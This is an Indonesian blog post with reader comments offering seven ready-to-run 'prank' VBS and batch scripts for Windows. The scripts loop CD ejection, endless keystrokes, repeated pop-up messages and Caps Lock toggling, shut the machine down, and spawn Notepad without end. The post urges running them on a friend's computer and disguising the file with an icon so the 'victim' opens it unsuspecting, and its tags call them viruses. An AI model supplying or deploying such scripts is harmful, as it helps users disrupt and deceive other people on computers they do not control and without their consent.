Kumpulan Script Jail untuk Komputer

Share this article on :
Kumpulan Script Jail untuk Komputer

Untuk hilangin kebosanan bermain didepan komputer, admin punya script-script jail untuk komputer tapi saya sarankan jangan gunakan script ini di komputer sendiri ya,, nanti kepala sobat jadi pusing akibat script jail ini, lebih baik gunakan saja di komputer atau laptop yang udah rusak atau di laptop teman kamu. biar  dibilang hacker, hehehe :b. Tapi jangan salahkan admin jika teman anda itu marah jika komputernya rusak akibat script jail tersebut. Sekali lagi, admin tidak akan bertanggung jawab dengan script ini, admin hanya sekedar berbagi, karena berbagi itu menyenangkan. gimana? Mau mencoba? Ini dia script-script jailnya.

1. Membuka dan menutup CD/DVD Komputer
Copy script dibawah ini dan paste di notepad anda.
Set oWMP = CreateObject(“WMPlayer.OCX.7″)Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count – 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
Simpan dengan format *.vbs
Lalu Buka File Tersebut.

2. Menulis otomatis di notepad
Copy script dibawah ini dan paste di notepad anda.
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do wscript.sleep 100
wshshell.sendkeys “Tulisan ini akan menulis sendiri di notepad anda”
loop
Simpan dengan format *.vbs

Lalu Buka File Tersebut.


3. Membuat Pesan muncul berulang – ulang
Copy script dibawah ini dan paste di notepad anda.
@ECHO off
:Begin
msg * hahahhaa
msg * santai boss
msg * ini hanya main-main
msg * jangan marah ya
msg * hanya bercanda
GOTO BEGIN
Simpan dengan format *.bat
Lalu Buka File Tersebut.


4. Membuat Komputer Shutdown dengan muncul pesan. Copy script dibawah ini dan paste di notepad anda.
@echo off
msg * Hahahahhaha
shutdown -s -c “Komputer anda mati”
Simpan dengan format *.bat
Lalu Buka File Tersebut.

5. Membuat Tombol Capslock terus menyala
Copy script dibawah ini dan paste di notepad anda.
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Simpan dengan format *.vbs
Lalu Buka File Tersebut.

6. Membuat terus – menerus menekan tombol “backspace”
Copy script dibawah ini dan paste di notepad anda.
MsgBox “Kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Simpan dengan format *.vbs
Lalu Buka File Tersebut.

7. Membuka notepad Terus – menerus
Copy script dibawah ini dan paste di notepad anda.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Simpan dengan format *.bat.
Lalu Buka File Tersebut


KETERANGAN
  • Cara menyimpan filenya : pilih save as lalu berikan nama filenya dan diakhiri dengan .vbs atau .bat. contoh Scripthacker.vbs atau Scripthacker.bat
  • Jika pesannya tidak keluar/muncul ubah saja msg * dengan echo.
  • Sobat buat shortcutnya lalu letakkan ke tempat yang sering dilihat seperti di desktop agar si korban, hehehe.. maksudnya pemilik komputer membuka file tersebut. Agar pemilik komputer tidak curiga, sobat tambahkan icon pada file tersebut.


TAG : Kumpulan script jail untuk komputer, cara membuat script jail dengan notepad, cara membuat virus dengan notepad, cara mematikan komputer dengan kode script, membuat virus mematikan dengan kode script di notepad.

Related Post

Ditulis Oleh : nanda zulvi rahman

Nanda Zulvi Rahman Artikel Kumpulan Script Jail untuk Komputer ini ditulis oleh nanda zulvi rahman pada hari Thursday, July 4, 2013 pukul 7:25 AM. Terimakasih atas kunjungan Anda pada blog ini. Kritik dan saran tentang Kumpulan Script Jail untuk Komputer dapat Anda sampaikan melalui kotak komentar dibawah ini. Bagi Sobat yang ingin mengcopy paste atau menyebar-luaskan artikel ini, tolong letakkan link dibawah ini sebagai sumbernya

9 comments on Kumpulan Script Jail untuk Komputer :

Riio Vanillavanka said... Reply comment Thursday, 04 July, 2013

Haahaayyyy...
Saatnya berbuat jahil neh...
thanks sudah berbagi gan... :D

nanda zulvi rahman said... Reply comment Thursday, 04 July, 2013

@Riio Vanillavanka_Sama-sama gan..
Selamat bersenang-senang dengan scriptnya gan,, hehe :)

software freeware said... Reply comment Friday, 05 July, 2013

nyetoppin bangaimana nih sob?

tips aneh said... Reply comment Friday, 05 July, 2013

bener2 jail nih sob, yg jadi korban passti kelenger nih, hahaha :D

nanda zulvi rahman said... Reply comment Friday, 05 July, 2013

@software freewarecara menghentikannya kamu harus merestart ulang komputernya.. saat dihidupkan kembali komputernya akan kembali seperti semula sob.

nanda zulvi rahman said... Reply comment Friday, 05 July, 2013

@tips aneh_haha,, script ini benar-benar jahil sob. Siapa aja yg menjalankan script ini pasti bikin pusing.. :D selamat mencoba sob

software freeware said... Reply comment Tuesday, 23 July, 2013

saya kembali lagi untuk mengcopy kembali scriptnya. ^_^

nanda zulvi rahman said... Reply comment Tuesday, 23 July, 2013

@software freeware_silahkan gan,, dicopy scriptnya ^_^

Anonymous said... Reply comment Saturday, 25 October, 2014

gan cara ngeluarin notepad nya gimana jika sudah kena hack

Jangan malu untuk meninggalkan komentar, kritik dan saran anda. berkomentarlah dengan baik, sopan, sesuai dgn isi postingan dan dengan bahasa Indonesia yang benar. No link aktif. no spam!

 

FOLLOW ADMIN ON INSTAGRAM


Recent Comment

:: Get this Widget here! ::

Friends Link

YOU'RE NEXT HERE!
Mau link anda dipasang disini juga? lihat persyaratan tukar link disini

SITE INFO


JOIN US ON FACEBOOK AND GET UPDATE! close

Get this widgethere